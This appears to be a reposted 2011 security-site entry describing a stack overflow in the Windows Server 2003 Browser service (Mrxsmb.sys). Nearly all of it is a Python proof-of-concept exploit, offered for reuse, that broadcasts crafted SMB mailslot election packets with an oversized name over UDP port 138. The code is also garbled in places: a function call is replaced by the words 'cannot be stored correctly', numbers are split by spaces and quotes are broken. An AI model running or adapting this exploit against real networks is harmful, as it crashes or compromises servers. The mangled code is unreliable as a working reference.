Windows Server 2 0 0 3 AD pre-authoritative stack overflow-vulnerability warning-the black bar safety net

2011-02-17T00:00:00
ID MYHACK58:62201129205
Type myhack58
Reporter 佚名
Modified 2011-02-17T00:00:00

Description

###############################################################################

Mrxsmb.sys, around BowserWriteErrorLog+0x175, while trying to copy 1go from

ESI to EDI ...

Code will look something like this:

if ((Len + 1) * sizeof(WCHAR)) > TotalBufferSize) { Len =

TotalSize/sizeof(WCHAR) - 1; }

-1 causes Len to go 0xFFFFFFFF

Feel free to reuse this code without restrictions and ask Kingcope-Fag to

perform his FTP FU on SMB, he might have more luck than MS. " import socket,sys,struct from socket import *

if len(sys. argv)<=4: sys. exit("""usage: python sploit.py UR-IP BCAST IP-NBT-NAME in AD-NAME example: python sploit.py 192.168.1.10 192.168.1.255 OhYeah AD-NETBIOS-NAME""")

ourip = sys. argv[1] host = sys. argv[2] srcname = sys. argv[3]. upper() dstname = sys. argv[4]. upper()

ELEC = "\x42\x4f\x00" WREDIR = "\x41\x41\x00"

def encodename(nbt,service): final = '\x20'+". join([chr((ord(i)>>4) + ord('A'))+chr((ord(i)&0xF) + ord('A')) for i in nbt])+((1 5 - len(nbt)) * str('\x43\x41'))+service return final

def lengthlittle(packet,addnum): length = struct. pack("<i", len(packet)+addnum)[0:2] return length

def lengthbig(packet,addnum): length = struct. pack(">i", len(packet)+addnum)[2:4] return length

def election(srcname): elec = "\x08" elec+= "\x09" #Be the boss or die elec+= "\xa8\x0f\x01\x20" #Be the boss or die elec+= "\x1b\xe9\xa5\x00" #Up time elec+= "\x00\x00\x00\x00" #Null, like SDLC elec+= srcname+"\x00" return elec

def smbheaderudp(op="\x25"): smbheader= "\xff\x53\x4d\x42" smbheader+= op smbheader+= "\x00" smbheader+= "\x00" smbheader+= "\x00\x00" smbheader+= "\x00" smbheader+= "\x00\x00" smbheader+= "\x00\x00" smbheader+= "\x00\x00\x00\x00\x00\x00\x00\x00" smbheader+= "\x00\x00" smbheader+= "\x00\x00" smbheader+= "\x00\x00" smbheader+= "\x00\x00" smbheader+= "\x00\x00" return smbheader

def trans2mailslot(tid="\x80\x0b",ip=ourip,sname="LOVE-SDL",dname="SRD-LOVE",namepipe="\CHANGES\BROWSE",srcservice="\x41\x41\x00",dstservice="\x41\x41\x00",pbrowser=""): packetbrowser = pbrowser packetmailslot = "\x01\x00" packetmailslot+= "\x00\x00" packetmailslot+= "\x02\x00" packetmailslot+= lengthlittle(packetbrowser+namepipe,4) packetmailslot+= namepipe +"\x00" packetdatagram = "\x11" packetdatagram+= "\x02" packetdatagram+= tid packetdatagram+= cannot be stored correctly(ip) packetdatagram+= "\x00\x8a" packetdatagram+= "\x00\xa7" packetdatagram+= "\x00\x00" packetdatagramname = encodename(sname,srcservice) packetdatagramname+= encodename(dname,dstservice) smbheader= smbheaderudp("\x25") packetrans2 = "\x11" packetrans2+= "\x00\x00" packetrans2+= lengthlittle(packetbrowser,0) packetrans2+= "\x00\x00" packetrans2+= "\x00\x00" packetrans2+= "\x00" packetrans2+= "\x00" packetrans2+= "\x00\x00" packetrans2+= "\xe8\x03\x00\x00" packetrans2+= "\x00\x00" packetrans2+= "\x00\x00" packetrans2+= "\x00\x00" packetrans2+= lengthlittle(packetbrowser,0) packetrans2+= lengthlittle(smbheader+packetrans2+packetmailslot,4) packetrans2+= "\x03" packetrans2+= "\x00" andoffset = lengthlittle(smbheader+packetrans2+packetmailslot,2) lengthcalc = packetdatagramname+smbheader+packetrans2+packetmailslot+packetbrowser packetfinal = packetdatagram+packetdatagramname+smbheader+packetrans2+packetmailslot+packetbrowser packetotalength = list(packetfinal) packetotalength[1 0:1 2] = lengthbig(lengthcalc,0) packetrans2final = ". join(packetotalength) return packetrans2final

def sockbroad(host,sourceservice,destservice,packet): s = socket(AF_INET,SOCK_DGRAM) s. setsockopt(SOL_SOCKET, SO_BROADCAST,1) s. bind(('0.0.0.0', 1 3 8)) try: packsmbheader = smbheaderudp("\x25") buffer0 = trans2mailslot(tid="\x80\x22",ip=ourip,sname=srcname,dname=dstname,namepipe="\CHANGES\BROWSER",srcservice=sourceservice, dstservice=destservice, pbrowser=packet) s. sendto(buffer0,(host,1 3 8)) except: print "expected SDL error:", sys. exc_info()[0] raise

sockbroad(host,WREDIR,ELEC,election("A" * 4 1 0)) # -> Zing it! (between ~6 0->4 1 0) print "Happy St-Valentine Bitches\nMSFT found that one loooooooong time ago...."